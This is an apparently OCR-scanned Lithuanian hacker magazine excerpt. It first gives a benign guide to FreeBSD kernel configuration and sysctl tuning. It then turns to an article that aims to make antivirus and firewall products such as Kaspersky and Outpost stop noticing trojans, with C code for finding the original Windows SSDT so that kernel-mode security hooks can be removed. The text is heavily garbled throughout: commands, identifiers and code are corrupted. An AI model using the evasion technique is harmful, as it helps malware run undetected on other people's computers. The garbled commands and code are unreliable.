Tigūruoji paprasto vartotojo kompiuteryje. 


options FAILSAFE 


Ši opcija padidina sistemos patikimumą, kadangi pavojingiau- 
siose vietose atlieka papildomus patikrinimus (deja, tai turi įta- 
kos spartumui). 


opiions  INELUDE CONFIC FILE 


Š opcija naudinga tuomet, jei tu netyčia prarastum konfigą. Ji 
naudojamą konfigūracijos byla įtraukia į kernel bylą, iš kur tu ją 
prireikus po to galėsi pasiimti. Labai abejotina opcija, kuri, be 
viso kito, dar naudoja atmintį. 

Kita eilutė praneša apie tai, kad branduolys vadinasi kernel, 


A aEnENIC — Generic kerus) configuration File Tor FeceDS0/ 06 
b 


A For morg infovantipa on Inis Eilę, plegie read hr Nandyvok section op 
a kernel Configuration PUES: 


tp: uv, PreeBSP-051/606/en. US. 1508853-1/Aooks/hadbook kane IcoM Ig-c0NF 
ig.NeAT 
“ 


A The Iandiaok is alta availaMė Iačally in URe4xhane/doc -hanšbook 
A At gos ve instalied the Ane Algtribution, othorcias alvays ze the 
« PreeD38 uorl Uide Web serves (httg://0mu „FreehSD 0247) Ior the 

a latest Iuformatios. 


1 
A An exhaustiuc Llst of aptions Am more detalicd explemations of the 

2 deutec Lines is eiso present in the „7. „>cant/NOTIS ad MOTĖS files 

A II you are in doust 45 to the purpose 0 necessitų OP A Line, chesk Hlest 
a In KOTES, 


2 
A SFeeeBSD: sravsųs/ [386 /c0ai GENERIC, V 1.394.2.3 2084/01/26 19:42:11 nectan Exp 
:] 


nechine 1586 
pu 186.crU 
GENERIC asmeniškai 


bus kraunamasi iš ad0, 0 dump'ai bus dedami į tą patį įrenginį, 
jeigu pas tave yra SCSI įrenginys, tuomet ad0 pakeisk į da0. 


eonfig kernel root on cd0 dumps on ud0 


Branduoliui išskirtos aiminties kiekis (rekomenduojama suma: 
žinti): 


opiions  "MAXMEM=(51271024)" 
O toliau eina susijusių parametių komplektas: 


opiions  USERCONFIG 
options USERCONFIG B00T 
opiions  VISUAL USERCONFI6 


Nurodžius pirmąją opciją, į branduolį bus įtrauktas branduolio 
nustatymų redaktorius, kuri tu galėsi iškviesti paleidimo metu, 
kai gavęs „boot“ pakvietimą, vietoje atsakymo įvesi -c. Su ant- 
raja opcija šis redaktorius pasileidžia automatiškai, o trečioji 
tau pateikia patogesnį vizualų to paties redaktoriaus variantą. 
Dabar reikia šiek tiek pasiaiškinti apie pseudoirenginius: 


4/ Pseudoterminalai, įvos cktyviai naudoja tokios programos, kaip telnet, rogin, ssh, sten 
pseudo-d8vice pIy 


1/ Nuzikos atkūrimas per kompiuterio garsiokol. Tokių melodijų pavyzdžių galimo rasi 
kataloge /ust/sbin/spkitest 
Oseudo-device speaker 


1/ Suspaustas vyklomas bylas pakuojame „veikimo metv“ (on Ihe Ily) 
pseudo-dėvice gziD 


4/ Paverčia bylą įrenginiu (vnode tvarkyklė). Su juo galimo, povyzdžiui, peržiūrėti diskelio 
atvaizdų kaip įprastinį diskelį, taip pat padidinti swap (sukuriame reikiamo dydžio bylo, 
„paverčiame“ ją „Gisku“ ir grijurgiome kaip swap). Tai veikia lik FreeBSD 4.x sistemose, 
Kadongi penktoje FeeBSD versijoje tokiems dalykams naudojami red įrenginiai 
pseudo-device vn 


J/ Aeidžio stekėti kitus prie konsolės prisijungusius vartotojus (tik mot vardu) 
pseudo-device s0p 


// Nktyvevus šį parametrą, keleią diskų (paticijų) galima apjungti į vieną loginę, kurti 
diskų veidrodžius (miror) 
pseudo-džvice (cd 


Dabar pereikimę prie tinklo pseudojrenginių: 


pscudo-dovico loop // grižiamojo šio sąsaje 

2seudo-dzvice ethor // suderinamumas su Ethemet 

pseudo-davice fddli // suderinamumas su FODI 

pseudo-device 5! // suderinamumas su SIP 

pseudo-device ppp // suderinamumas su PPP 

pseudo-dzvice dise // as pats, kas it /dev/null, ik skiria įrenginians. Faprostam darbui Io 
nereikia 

psaudo-dėvice tun // šį įrenginį naudojo ppp programa 


Labai dažnai po įrenginio pavadinimo galima matyti skaičių, ku- 
tis reiškia sukuriamų atitinkamų įrenginių kiekį (/dev/fo00 — / 


dev/fooN). Šiuolaikinėse FreeBSD versijose pseudojrenginiai vei- 
kia kaip taip vadinami clonable devices, t.y. eilinis įrenginys su- 
kuriamas kai būtina, todėl kiekio nurodyti nereikia. 

Metas kompiliuoti ir įdiegti branduolį: 


td /usi/sic 
+ mūke buildkernel KERNCONF-- MYKERNEL 
+* moke installkernel KERNCONF — MYKERNEL 


Šis mechanizmas jau senai pakeitė seną config MYKERNEL 84: 
cd ../..Jcompile/IMYKERNEL 84 make dep RR. make 88 make 
install. Persikraunam ir mėgaujamės savo darbu. Nelaimei, kar- 
tais tenka kovoti su kernel panic. Jeigu taip nutiko, užkrauk se- 
nąjį branduolį ir sugrąžinti jį atgal. Tarkim, tavo senojo branduo- 
lio pavadinimas buvo kernel.null. Jokiu būdu šios bylos nepava- 
dink kernel.old. Kai gausi komandos įvedimo kvietimą boot:, 
įvesk boot: kernel.null. O jam užsikrovus: 


*d 

+ dhllags noschg kame! 
* (p kemel kernel new 
+ gp kernel.null kernel 
+ dhflags schą kemel 
+ reboot 


Penktoje FreeBSD versijoje branduolio, kuris skiriasi nuo /boot/ 
Kernel/kernel, užkrovimo mechanizmas šiek tiek kitoks (ok — 
tai užkrovėjo komandos įvedimo kvietimas): 


ok kldunload 
ok set module path /boot/kenel.ald 
ok boot /hoot/kerel old/kernel 


Sistemoje turi būti byla /boot.config, priešingu atveju ja gali su- 
kurti štai su tokia komanda: 


+ echo /boot/loader > /buol.cantig 


Be to, būtinai patikrink, kad kataloge /boot būtų šios bylos: 
bootO, boot1, boot2, loader. Viskas, važiuojam toliau. 


[„FreeBSD“ tobulinimas su „sysetl“] Syscti mechanizmas Iei- 
džia tiesiog „veikimo metu“ dinamiškai perkonfigūruoti ir derinti 
kai kuriuos operacinės sistemos komponentus. Su sysct/ gali- 
ma optimizuoti daugybę dalykų: tinklo posisteme, virtualios at- 
minties, kietųjų diskų darbą ir t.t. Vartotojo erdvėje (userland) 
veikianti sysct/ valdo pagrindinius branduolio kintamuosius. Ap- 
tarsime įdomiausius iš jų, tačiau iš pradžių išsiaiškinsime dar- 
bo su sysct/ metodus. 

Norint į ekraną išvesti visus prieinamus sysct/ kintamuosius, 
reikia pasinaudoti komanda 


A asdl ou 
Norint nuskaityti konkretų kintamąjį: 
+ sysdl kintamojo pavadinimas 


Norint priskirti kintamajam tam tikrą reikšmę: 


+ sysall kintamojo. pavadinimas = priskiriama reikšmė 


Sysct! kintamųjų reikšmės paprastai gali būti šių tipų: eilu- 
tės, skaičiai ir loginiai (1 — taip, 0 — ne). Jeigu tu nenori 
kiekvieną kartą užsikrovus sistemai rankiniu būdu konfigū- 
ruoti reikiamų sisteminių kintamųjų reikšmių, pridėk jas prie 
/etc/sysctl.conf.. 


[Saugumo valdymas] security:bsd.unprivileged.proc debug 
leidžia derinti vartotojo procesą (pavyzdžiui, su ptrace). 
security.bsd.see other uids, security.bsd.see other gids — lei- 
džia vartotojams matyti svetimus procesus ir soketus, pasinau- 
dojant komandomis ps, netstat ir procfs. 
security.bsd.unprivileged read msgbuf — leidžia vartotojo pro- 
cesui skaityti iš sisteminio konsolinio pranešimų buferio. 
security.bsd.hardlink check uid,security.bsd.hardlink check gid 
vartotojai gali kurti hardlinkus tik į savo bylas. 
security.bsd.conservative signals setuid/setgid — draudžia se- 
tuid/setgid procesams siųsti kai kuriuos signalus. 
security.bsd.unprivileged get guota — leidžia vartotojams per- 
žiūrėti jiems priskirtų kvotų informaciją. 


[Diskų optimizavimas] vis.vmiodirenable — ši opcija atsakin- 
ga už katalogų kešavimo metodą. Iš esmės jos reikia tik tose 
mašinose, kurios operuoja dideliu bylų kiekiu, pavyzdžiui, pašto 
serveriuose. 

vfs.write behind — leidžia bylas į kaupiklį rašyti klasteriais. 
vfs.hirunningspace —nustato rašymo į diską užklausų kiekį, ku- 
rios gali stovėti eilėje. Šį parametrą galima padidinti (ypač ma- 
šinose su dideliu diskų kiekiu), tačiau ne per daug, nes priešin- 
gu atveju taip galima sumažinti našumą. 
vm.swap idle enabled — šio kintamojo (kartu su vm.swap. id- 
Ie threshold1 ir vm.swap. idle threshold2) teikia tik mašinose, 
su kuriomis dirba daug vartotoju ir paleista daug procesų. 
hw.ata.wc — įjungia ir išjungia rašymo į IDE diską kešavimo 
režimą. Išjungus šią opciją, pastebimas apčiuopiamas našumo 
kritimas. Jos atsisakymo priežastis gali būti senesnė FreeBSD 
sistemos versija (<= 4.3) arba su aparatūrine įranga susiju- 
sios problemos. 

kern.cam.scsi delay šio parametro (nurodomas milisekun- 
dėmis) sumažinimas paprastai sumažina sistemos užkrovimo 
laiką. Iš principo, šiuolaikinėje mašinoje šią reikšmę galima su- 
mažinti iki 5. Ši opcija naudojama FreeBSD >= 5.0 sistemose 
ir yra konfigūruojama krovimosi metu. 


[Darbas tinkle] net.inet.ip.forwarding — priskyrus šio kinta- 
mojo reikšmę lygią 1, mašina pradės nukreipinėti IPv4 paketus 
tarp tinklo sąsajų. 

net.inet.tcp.sendspace ir net.inet.tcp.recvspace Įeinantis ir 
išeinantis TCP prisijungimų buferiai. Įprastinė reikšmė mašino- 
se su dideliu atminties kiekiu — 65535. Prieš didindamas šį 
parametrą, žvilgtelėk į net.inet.top.rfc1323 bei į tuning(7) do- 
kumentaciją (manual pages). 

net.inet.tcp.msl=7500 — ACK laukimo laikas, atsakant į SY- 
N-ACK arba FIN-ACK (milisekundėmis) 
net.inet.icmp.icmplim=50 — nurodome maksimalų ICMP pa- 
ketų kiekį su destination-unreachable tipu ir tų TCP paketų kie- 
kį, kuriose nustatyta RST vėliavėlė (šiuo atveju tai reiškia 50 
paketų per sekundę). 
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Komandos syseti -a pateikiama informacija 


net.inet.tcp.blackhole=2 -— nurodome neišsiunčiant RST at- 
metinėti visus TCP paketus, kurie kreipiasi į uždarytą jungtį. 
net.inet.udp.blackhole=1 — nurodome atmetinėti visus UDP 
paketus, kurie kreipiasi į uždarytą jungtį. 

kem.ipc.somaxconn =1024 — vienu metu atidarytų soketų skai- 
čiaus pakeitimas. 


[Naudingos smulkmenos] Ką zi, zallma manyti, kad beveik 
baigėme savo FreeBSD optimizavimo kelią. Mes savo sistemo- 
je atlikome du globalius perversmus: perkompiliavom branduolį 
ir patobulinom sysot! kintamųjų reikšmes. Tačiau dar liko tam 
tikrų smulkmenų, apie kurias verta papasakoti bei duoti keletą 
patarimų. 

Mes jau aptarėme situaciją, kai šviežiai sukompiliuotas bran- 
duolys nenori krautis, tačiau nutinka taip, kad problemos iškyla 
dar anksčiau. Kaip tik jas mes ir išspręsim. 

1. Nepavyksta įvykdyti komandos config (kompiliavimas nutrau- 
kiamas su pranešimų unknown option) — akivaizdu, jog tavo 
branduolyje kažkur yra sintaksės klaida. Tokiu atveju komanda 
config pateiks eilutės, kurioje aptikta klaida, numerį. 

2. Nepawyksta įvykdyti komandos make — ką gi, greičiausiai tai 
reiškia, kad konfige slypi klaida, kuri nėra tokia akivaizdi, kad 
config ją aptiktų, arba tai kokia nors kompiliavimo klaida. 

3. Nepawksta idiegti branduolio (make install arba make ins- 
tallkernel) — jeigu FreeBSD versija yra ketvirta ar senesnė, tai 
reikia patikrinti, ar nenurodytas 1 ar aukštesnis saugumo lygis 
(security level), kadangi branduolys šiose sistemos versijose gali 
būti įdiegtas tik kai saugumo lygis yra nulinis. 

Jeigu naujas branduolys sėkmingai sukompiliuotas ir užkrau- 
tas, tačiau neveikia tokie įrankiai, kaip ps ir top, tai reiškia, 
kad įvyko branduolio ir vartotojiškos pusės asinchronizacija, 
kitaip tariant, branduolio išeities tekstų versija nesutampa su 
sisteminių įrankių versijomis. Būtina viską sutvarkyti taip, kad 
visos versijos būtų vienodos (negalima ketvirtoje sistemos ver- 
sijoje kompiliuoti penktos versijos branduolio). 

Senesnės nei 5.0 versijos FreeBSD savininkai gali patirti sun- 
kumų kurdami įrenginių bylas. Paaiškinsiu plačiau, remdama- 
sis pavyzdžiu. Daugelis įrenginių savo bylas yra susikūrę kata- 
loge /dev, Jas po pirmojo įdiegimo sukuria /dev/MAKEDEV skrip- 
tas. Tačiau gali nutikti taip, kad įrenginį į sistemą teks įdiegti 


pačiam. Tarkim, mums reikia įdiegti IDE CD-ROM'ą. Iš pra- 
džių prie branduolio konfigo derėtų pridėti eilutę device acdO. 
Dabar reikia patikrinti katalogą /dev, ar jame nėra bylų pavadi- 
nimų, kurios prasideda acd0. Jeigu jos yra, tuomet galima 
nusiraminti, o jeigu ne — reikia įvykdyti 


4 sh MAKEDA! acd0 


Pastaba: tinklo įrenginiai neturi /dev bylų, o SCSI valdikliai nau- 
doja vienodą /dev bylų rinkinį, todėl kurti jų bylų nereikia. 

Su sysct! kintamaisiais galima nuimti tam tikrus branduolio su- 
konfigūruotus apribojimus: 

kern.maxfiles — nurodo maksimalų failų deskriptorių kiekį. 
Standartinę reikšmę nurodo parametras mMaxusers. 
kern.ipc.somaxconn kaip tikriausiai pamenat, su šiuo pa- 
rametru galima keisti vienu metu atidarytų soketų kiekį. 
net.inet.ip.portrange.* — šie parametrai atsakingi už jungčių 
kiekio apribojimus. Kai kuriose situacijose pagal nutylėjimą iš- 
skirto kiekio gali neužtekti. Jungčių diapazonas kontroliuojamas 
su net.inet.ip.portrange.first ir net.inet.ip.portrange.last para- 
metrais, kuriuos ir reikia redaguoti. 
net.inet.tcp.inflight enable priskyrus lygu 1, ši opcija Užlai- 
ko kiekvieno susijungimo paketus, tuo pačiu apribodama per- 
duodamų duomenų apimtį Ir užtikrindama optimalų kanalo pra- 
laidumą. Naudojant šį kintamąjį, parametrą net.inet.tep.in- 
flight debug reikia padaryti lygiu O bei kintamajam net.inet.tcp.in- 
flight min priskirti reikšmę, kuri artima minimaliai — 6144. Tuo 
pačiu net.inet.top.inflight stab pageidautina nekeisti arba keisti 
sinchroniškai (šiaip ar taip, tai yra kraštutinė priemonė). 

Dar keletas žodžių apie tinklo apribojimus. Branduolio opcija 
NMBCLUSTERS salygoja mašinai prieinamų mbuf kieki (mbuf 
funkcijos ir struktūros užtikrina atminties buferių, kuriuos nau- 
doja branduolio tinklo posistemė, valdymą). Daug tinklo srauto 
apdorojančiame serveryje maža mbuf reikšmė sumažins na- 
šumą, todėl šį parametrą būtina protingai pakoreguoti. Ma- 
šinoms su solidžia atminties apimtimi optimalios reikšmės 
svyruoja tarp 4096 ir 32768. Negalima nurodyti per daug 
didelės reikšmės — po to sistema gali nulūžti besikrauda- 
ma. Šiuo metu naudojamų tinklo klasterių kiekį galima suži- 
noti su komanda netstat -m. Konfigūravimui krovimosi metu 
panaudok kintamąjį kern.ipc.nmbelusters. 

Kai kurie aukščiau pateikti sysct! kintamieji skirti tik skaityti. 
Norint išspręsti šią situaciją, reikiamą kintamąjį reikia įtraukti | 
bylą /boot/Ioader.conf. Nustatymai pagal nutylėjimą saugomi / 
boot/defaults/Ioader.conf konfige. 

Ir pabaigai: konfigūruodamas sistema, nepamiršk /etc/rc.conf. 
Šioje byloje saugoma sistemos krovimosi Metu panaudojama 
konfigūracinė informacija. Visus pasikeitimus reikia įtraukti bū- 
tent į /eto/rc.conf, kad taip pakeistum /etc/defaults/rc.conf by- 
loje esančias reikšmes pagal nutylėjimą. 

Štai ir viskas. Tu gavai savo svajonių demoną. Viskas pasiro- 
dė ne taip ir sudėtin- 
ga. Jeigu prireiks pa- 
pildomos informaci- 
jos, nepatingėk žvilg- 
telėti į dokumentaci- 
ją ir pasinaudoti dė- 
dulės Google paslau- 
gomis ;) 


* sysctl kern.maxfiles 
kern.maxfiles: 3976 

* sysctl kern.maxfiles-3977 
kern.maxfiles: 3976 -> 3977 
* sysctl kern.maxfiles 
kern.maxfiles: 3977 

a 
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Mirtis apsaugoms 


KAD TU ŽINOTUM, KAIP 
SOS TOS APSAUGOS. VI 


MAN ĮGRISO VI- 
SOKIE ANTIVIRU- 


SAI, UGNIASIENĖS. FU! JAU NEGYVAI UŽ- 


KNISO. TEREIKIA VIENAM 
MODIFIKUOTI KITĄ PROC 
KARTO PRADEDA RĖKTI 


MANO PROCESUI 
ESĄ, KAIP JOS IŠ 
R NELEIDŽIA Į IN- 


TERNETĄ, O VISOSE SANTYKINAI NEKENKS- 


MINGOSE HAKERIŠKOS 
JOS MATO VIRUSUS — TI 


E PROGRAMOSE 
RAS KOSMARAS! 


GALĖTŲ VISA TAI PAGALIAU LIAUTIS. REIKIA 
KVAILOMS APSAUGOMS ILGAM IŠMUŠTI 


NORĄ GADINTI GYVENIM 


Ą PADORIAM HA- 


KERIUI. KĄ GI, TO IR IMS 


MES. 


Padedame asmeninėms 


apsaugoms atprasti nuo kenksmingų įpročių 
Aš atlikau tam tikrą tyrimą, pasėdėjau prie derintuvo 
bei disasemblerio ir padariau 
meninių Windows mai skirtl 
vos ne hakerišku princip: t 
skaita daugelis šiuolaikinių trojanų slepiasi nuo peril lyg smal 
saus vartotojo akių (išsamiau apie tai gali paskaityti mūsų žur 
nalo rugpjūčio numeryje, straipsnyje „Nemati pro; 
Taip, tu teisingai supratai, kalbu apie API perėmimą 
perima kai kuri rėjų nuomone, svarbias sistemir 
jas ir stebi, kad hakeris su jomis negalėtų iškrėsti ko nors bjau- 
raus. Taip jos trukdo paleisti virusus, neleidžia | ti procesų 
su įdiegtu trojanų kodu ir panašiai, žodžiu, bando įvesti tvarką, 
nuolat stebėdamos svarbius sisteminius įvykius. 

Pavyzdžiui, paimkim nuostabią asmeninę ugniasienę Agnitum 
Outpost. Jeigu neklystu, pradedant 2.5 versija, ši ugniasienė 
skirta išvengti apėjimo įdiegiant ir paleidžiant kodą patikimos 
progiamos adresų erdvėje (išsamiau apie tai skaityk mūs: 
nale, straipsnyje „Klizma ugniasienei*), perima proceso atmin 
ties modifikavimo žemo lygio sisteminio > dalį, funkciją 
NiWriteVirtualMemory. Jeigu staiga trojar savo ka 
pavyzdžiui, iexplore.exe procesą, Outpost akimirksniu į tai sure 
aguos, uždrausdamas modifikuotai naršyklei išeiti | internetą. 
Čia perėmimas yra tik vienas, bet koks jis šlykštus! Dėl to seno- 
vinis, Windows 2000 sistemoje panaudojamas ugniasienės apė 


ij 


jimo būdas patiria nesėkmę ir ištisa krūva jį išnaudojančių pri- 
vačių trojanų keliauja į dausas. 

Arba štai kitas pavyzdys — virusų kūrėjų iki dieglių mėgiamas 
Kasperskio antivirusas. Perėmimų atžvilgiu tai tikras monstras! 
Jis darko net 9 ne pačias paskutines Native API funkcijas, tarp 
kurių yra NtCreateProcess, leidžiantis stebėti procesų paleidi- 
mą (tiksliau šnekant, virusų paleidimą) ir net NiOpenProcess, 
leidžiantis išvengti hakerių įsikišimo į antiviruso darbą (AVP tie- 
siog neleis atidaryti nuosavo proceso). 

O dabar įsivaizduok, kad pas mus atsirado galimybė iš šitų ir 
kitų asmeninių apsaugų atimti visas perėmimo galimybes. Įsi- 
vaizduok: AVP nebeseka virusų, Outpost daugiau neblokuoja tro- 
Jano modifikuotos naršyklės, koks nors ZoneAlarm su maksi- 
maliu saugumo lygiu tyli apie kiekvieną paleidžiamą nežinomą 
programą, taip bet kokia sistemą stebinti apsauga staiga užsi- 
čiaupia. Nenutraukia savo darbo, nenulūžta su pranešimu apie 
klaidą, o tiesiog nutyla. Nei tau išmeta kokių nors perspėjimų 
apie virusus, nei ugniasienės keiksmažodžius — skamba ne- 
blogai, tiesa? 

Tik gauti tokią galimybę ne taip jau paprasta. Tu tikriausiai 
Jau pastebėjai, kad visos mano aukščiau paminėtos apsau- 
gos perima Native API — šioje nemalonioje tendencijoje ir 
slypi pagrindinė problema. Esmė tame, kad nė viena save 
gerbianti apsauga nepradės periminėti kokių nors vartotojo 
lygio sisteminių įvykių. Ji pasistengs maksimaliai apsunkinti 
hakerio gyvenimą, iš ko išplaukia, kad viską darys išskirtinai 
branduolio lygyje (kernei mode), kur vartotojo koja be admi- 
nistratoriaus teisių dar nėra žengusi. Taigi atsikratyti perėmi- 
mo branduolio lygyje kur kas sudėtingiau, nei nuo paprasto 
importo lentelės įrašo pakeitimo arba funkcijų splaisingo var- 
totojo režime. Tai sudėtingiau, tačiau mums nėra nieko ne- 
įmanomo! 


.———————————— 
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VICE suseka Kasperskio antiviruso pėrėmimus 


[API perėmimas branduolio režime] Tam tikrą sisteminį įvykį 
galima stebėti skirtinguose jo etapuose. Pasakiau gerai, tačiau 
manau, kad Iliustravus pavyzdžiu viskas bus aiškiau. Tarkim, yra 
vieno proceso atminties modifikavimo iš kito proceso įvykis. No- 
rėdami apeiti ugniasienę, mes jį iškviečiame su funkcija WriteP- 
rocessMemory. Apsauga gali perimti funkciją, ir to pakaks no- 
rint užkirsti kelią hakeriškai veiklai. Tačiau programuotojui nieko 
nereiškia vartotojo režime apeiti šį perėmimą. Apsauga taip pat 
gali perimti Native AP! funkciją NtWriteVirtualMemory. kuri yra 
eksportuojama iš ntdll.dll bibliotekos, tačiau ir šis perėmimas 
bus atliekamas vartotojo lygyje, iš ko išplaukia, kad jis bus ne- 
patikimas. Dėl to apsaugų kūrėjai pirmenybę teikia perėmimo 
realizacijai branduolio lygyje. Rašo tvarkykles ir tyliai ramiai Ser- 
vice Descriptor Table lentelėje pakeičia Native API funkcijų ad- 
resus (jeigu tu dar nežinai, kas yra SDT, arba nesi pakankamai 
susipažinęs su Windows žemutinio lygio veikimo mechanizmu, 
labai rekomenduoju perskaityti Sveno Šraiberio knygą „Nedo- 
kumentuotos Windows 2000 galimybės“ arba www.roctkit.com 
svetainėje pateikiamus straipsnius). Tai daroma labai lengvai, 
faktiškai su viena kodo eilute (savaime suprantama, prieš len- 
telės elemento pakeitimą reikia nepamiršti nunulinti WP bit ir 
uždrausti pertraukimų): 


// iš pradžių apibrėžiamas paprastas makrosos 

doline SYSTEMSERVICE( function) KeSaniceDesciptorlable- > 
ntoskinl.Servicelable["(PULONG)((PUCHAR) function - I)] 

// a po to atliekamas pakeitimos 

SYSTEMSERVICE(NiWriteViriuclMemory)  NewNiWriteVirtuolMemony; 
KoSeivireDescripto:Table — tai hranduolio eksportuojama rodyklė į SDT, kurios stuktūra 

saugoma sisteminių servisų lentelėje, iš kurios finale ir imami Native 4P! funkcijų adresai 
SDI ir 5ST struktūros 
typedof struct SERVICE DESCRIPTOR TABLE 


i 
PNTPROC SeiviceToble; 
PDWORD CounterTable; 
ULONG Seivicelimit; 
PBYTE ArgumeniTable; 
) SERVICE DESCRIPTOR TABLE; 


Norint gauti SDT ląstelės numeri, kurioje bus saugomas peri- 
mamos branduolio lygio Native API funkcijos adresas. reikia vi- 
so labo prie funkcijos-perėjimo su tuo pačiu pavadinimu iš 
ntall.all adreso pridėti vienetuką ir paimti gautu adresu saugo- 
mą reikšmę. Tau tikriausiai įdomu, iš kur ten atsiras šis nume- 
ris? Viskas labai paprasta. Pabandykime disasembliuoti bet ku- 
rią Native API funkciją, kurią eksportuoja ntdll.all: 


„NWitsVitualemoy“ funk iš „ala“ Iibliaekos 
881501 0000 mov e0x, 15h 

BA00 03 FE 7F mov edx, 7FFE0300h 

RF12 call dvord pr [edk] 

2 M 00ren Th 


Pirmasis funkcijos kodo baitas — tai instrukcijos MOV eax,imm32 
opkodas. Keturi po jo einantys baitai — tai imm32 arba, kitaip 
tariant, duomenys, kurie patalpinami į eax registrą, t.y. funkci- 
jos indeksas iš SDT. Ir taip yra su visu Native API. Savaime su- 
prantama, SDT įrašų pakeitimas — tai anaiptol ne vienintelis 
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perėmimo būdas branduolio lygyje. Funkcijas galima pataisyti 
tiesiog pačiame ntoskrni.exe (branduolyje), galima periminėti 
sysenter, netgi galima sukurti savo SDT lentelę ir pakeisti Ke- 
ServiceDescriptorTabie, tačiau apsaugų kūrėjams visa tai nėra 
būtinas vargas, todėl jie apsiriboja pačiu banaliausiu būdu. O 
veltui. Dabar aš parodysiu, kaip paprastai hakeriai atsikrato pa- 
našaus perėmimo. 


[Atsikratome perėmimų branduolio režime] Norint aitsi- 
kratyti perėmimo, realizuojamo pakeičiant SDT įrašą, reikia 
surasti lentelės originalą ir atlikti pakeitimą. Savaime supran- 
tama, vartotojo režime (user mode) viso to padaryti nepa- 
vyks. Surasti visus adresus gal dar ir pavyktų, tačiau pakeisti 
adreso — ne, čia jau teks leistis į ringO. Gerai, kad mes tai 
jau mokam daryti ir net turime normalią, veikiančią funkciją 
(i buvo pateikta mano straipsnyje „Absoliutus nulis profesio- 
nalui“, kutį gali rasti praėjusių metų gegužės „Hakerio“ nu- 
meryje). Taigi pirmas dalykas, kurį mes padarysimė — už- 
krausime savo branduolio kopiją ir joje surasime SDT. Bran- 
duolys — tai paprastai ntoskrni.exe, tačiau boot.ini byloje 
gali būti nurodyta ir kita byla, todėl nederetų orientuotis į 
vieną žinomą pavadinimą, geriau jį raštingai gauti, į pagalbą 
pasitelkus Native API funkciją NtOuerySysteminformation, ku- 
rią eksportuoja ntdil.dil. 


NISTATUS (WINAPI * — Niūuer;Sysieminformation) 

(UJNT, PVOID, ULONG, PULONS); 

HMODULE hntdll = GeiModuleitandle(“ntdll.dll"); 

"IFARPROL "Jė. MiOuerySysteminfamation = 6etPrachddress(hnidll, “ŽeAuerSystemin- 
lormation"); 

DWORD «= NiūverySystem!nformation(Sysiem/Hodulelniormarion, pHodules, 4, dlle- 
ededSize); 


i 
Macules= (FMODULES)Globalk!loc(GPTR, dvbleededSize): 
= NūueySystemintomalion( 
SyslemAlodulelnformatios,pModules,dwNeededSize,NULL); 


J: 

else return FALSE; 

if (INT SUCCESS(64)) return FALSE; 

// branduolio udresas 

ONORD dywkemelBase = (DWORD)pModules- >> 5mi.Base; 

// branduolio bylas pavadinimo adresas 

PEHAR pKainellame = pHodules- > smi.ModuleNamedfise! + Modules >> 5mi.Image- 
Name; 


Puiku, dabar mes turime bylos pavadinimą, todėl galime už- 
krauti savo branduolio kopiją. Tai daroma taip pat, kaip ir su 
įprastiniu DLL, tik įspėjant sistemą, kad nereikia krauti Dl/Main: 


// VONG RESOLYE DLL. REFERĖNCĖS — rekraunome Dilkain 

HNODULĖ hKemel= Laodlibiaryčs(pkermeltlame, 0, BONT RESOLYE DU REFEREI- 
65) 

iš (INKernel) return FALSE; 


Dabar gautoje branduolio kopijoje surasime SDT adreso p0- 
slinkį. Paties adreso ten nebus, kadangi kintamasis KeService- 
DescriptorTable nebuvo Inicializuotas, tačiau poslinkis mums 
pravers norint šį adresą surasti branduolio kodo tankynėje. 


if ((dwkSDT = (DWORD)Ge:ProcAddress(hKemel,"KeServiceDest1ipto: Table") 
rotum FALSĘ; 

dw(SDT = (DWORD)hkerel: 

if (dukiSeniceTable = FindkiServiceTatle(hkemel dykSDT))) 
return FALSĘ; 


FindkiServiceTable — tai žvėriškai jėgiška funkcija, kurią pa- 
rašė koderis 90210 ir kuri buvo pateikta www.rootkit.com 
svetainėje, jo straipsnyje apie antinukingą branduolio lygyje. 
Ši funkcija grąžina SDT poslinkį branduolio modulio pradžios 
atžvilgiu. Ji branduolyje ieško mov ;mem32], imm32 iorma- 
to instrukcijos. O tiksliau, ieškoma KilnitSystom funkcijoje 
esanti instrukcija mov ds: KeServiceDescriptorTabie.Base, of. 
fset KiServiceTabie. Paieška orientuojasi | KeServiceDesc- 
tiptorTable poslinkį, kuris buvo gautas po aukščiau atliktų ma- 
nipuliacijų. 


„FindKiSeviceTable“ funkcija 
DWORD FindkiServiceTable(HMODULE hModule,DWORD dwSDT) 


k 
PINAGE EILE HEADĖR ph 
PIMAGE OPTIONAL HEADER poh; 
PIMAGE SECTION HEADER pst; 
PIMAGE BASE RFLOCATION ph: 
PIMAGE FIXUP ENTRY pie; 
DWOKO Akfikups = O, 
į dwPointerRva,dwPoinisTokva, dvkiSenviceToble; 
B00L bFistChunk; 
GeiHeodeis((PCHAR)hModule, 8p!h, špot, Rpsh); 
ii ((goh-> DaraDiecoy(INAGE DIREČIORY ENTRY BASERELOCĮ Virvolddies) 88 
(pfh->Charaderistics)SIMAGE FILE RELOCS STRIPPED)Y) 


i 

phr= (HMAGE BASE RELOCATION)RVATOVA(poh- >> 
DataBireciory(IMAGE DIRECIORY ENTRY BASERELOCĮ Virtuolkddress, hMadule); 

bFirstChunk= TRUE: 

while (bFistChuok || pbr- > VirtualAddress) ( 
bristChunk= FALSĘ; 
ple= (PIMAGE FIXUP ENTRY)(|DWORD)phr + sizecH(IMAGE BASE RELOCATION)); 

for (= zi E (pbr-> SizeOtbiock - sizeof(IMAGE BASE KELOCA- 
TION))> > 14i+ +,pe+ +) 


i 

i (pfe->- type — = UMAGE RCL BASED HIGALOW) Į 
duFiups+- +; 
dvwPointerRva = pbt- > Viriunlkddiess -+ pfe- > olhset: 
diuPointsToRva =" (PDWOFOJ((DWORD)1Module - 
dwPainte:Rvo)-(DAORD)pah- > ImogeBose; 
if (dwPointsToRva= = dwISOT) 


1 
II (" (PWORD)((OWORD) Module -+ diwPointerRva-2) = =0x05C7) 


dwkišeivicetoble =" (FOWORD)((DWORD)hMadule + dwPainterRva +-4) - pob 
>-ImageBase; 
return dyykiSeniceloble; 
j 
bj 
b 


1 
*(PDWORD)8pbr + = por > Sizs0fBlock; 
Ugnidsienės apėjimas — 9 Kb kodo reikalas 


return O; 


Gavę SDT poslinkį, mes jį pridedame prie mūsų branduolio ko- 
pijos bazės, tai ir bus originalios lentelės adresas. Dėl viso pik- 
to visą SDT turinį nukopijuojame į nuosavą DWORD masyvą ir 
džiaugiamės pagrindinis darbas padarytas, originalas gau- 
tas. 


Geitlenders((PCHAR)hKerel,Rolh, Rpoh, Rpsh); 
pSavice — (POWORD)((DWORD)hKemnel -- dwkiSeiviceToble); 
tos pSavice = |POMORO)|(OMORD)Nkenel du SeniceTabe); 
vice-poh- > ImageBase< poh-> Size0flmage; 
